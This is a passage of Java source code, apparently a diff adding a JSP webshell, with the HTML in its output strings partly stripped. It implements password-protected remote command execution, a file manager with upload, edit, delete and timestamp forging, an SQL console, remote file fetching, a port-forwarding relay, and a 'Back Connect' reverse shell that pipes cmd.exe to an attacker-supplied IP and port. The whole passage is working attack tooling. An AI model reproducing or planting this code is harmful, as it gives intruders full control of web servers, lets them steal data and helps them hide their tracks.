    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { 
+output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("

    "); +out.println("
    ");
    +String command = request.getParameter("command");
    +if (!Util.isEmpty(command)) {
    +Process pro = Runtime.getRuntime().exec(command);
    +BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    +String s = reader.readLine();
    +while (s != null) {
    +out.println(Util.htmlEncode(Util.getStr(s)));
    +s = reader.readLine();
    +}
    +reader.close();
    +out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); 
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MoveInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String src = request.getParameter("src");
+String target = request.getParameter("to");
+if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
+File file = new File(src);
+if(file.renameTo(new File(target))) {
+JSession.setAttribute(MSG,"Move File Success!");
+} else {
+String msg = "Move File Failed!";
+if (file.isDirectory()) {
+msg += "The Move Will Failed When The Directory Is Not Empty.";
+}
+JSession.setAttribute(MSG,msg);
+}
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class RemoteDirInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String dir = request.getParameter("dir");
+File file = new File(dir);
+if (file.exists()) {
+deleteFile(file);
+deleteDir(file);
+}
+
+JSession.setAttribute(MSG,"Remove Directory Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+public void deleteFile(File f) {
+if (f.isFile()) {
+f.delete();
+}else {
+File[] list = f.listFiles();
+for (File ff:list) {
+deleteFile(ff);
+}
+}
+}
+public void deleteDir(File f) {
+File[] list = f.listFiles();
+if (list.length == 0) {
+f.delete();
+} else {
+for (File ff:list) {
+deleteDir(ff);
+}
+deleteDir(f);
+}
+}
+}
+private static class PackBatchInvoker extends DefaultInvoker{
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void
invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if 
(pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream 
output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); 
+remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); 
+JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
